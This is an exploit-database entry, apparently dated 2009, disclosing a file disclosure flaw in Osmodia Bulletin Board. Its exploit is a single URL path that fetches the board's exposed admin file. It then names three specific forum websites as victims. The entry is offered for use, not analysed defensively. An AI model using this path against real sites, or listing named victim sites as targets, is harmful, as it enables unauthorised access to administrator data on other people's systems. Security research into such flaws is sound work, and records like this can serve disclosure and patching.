id: 4873
date: 02/20/2009
title: Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability
author: Pouya_Server
cves: 

====================================================================
Osmodia Bulletin Board 1.x (admin.txt) File Disclosure Vulnerability
====================================================================


#########################################################
---------------------------------------------------------
Portal Name: Osmodia Bulletin Board
Version : All Version
Author : Pouya_Server 
---------------------------------------------------------
#########################################################
[Xpl]:
http://site/[Path]/members/admin.txt
------------------------------------------
Victem :
http://www.a4-freunde.de/foren
http://www.kirk1980.de/abiboard
http://www.autothieme.de/forum
---------------------------------------------------------
#########################################################



#  0day.today [2023-03-26]  #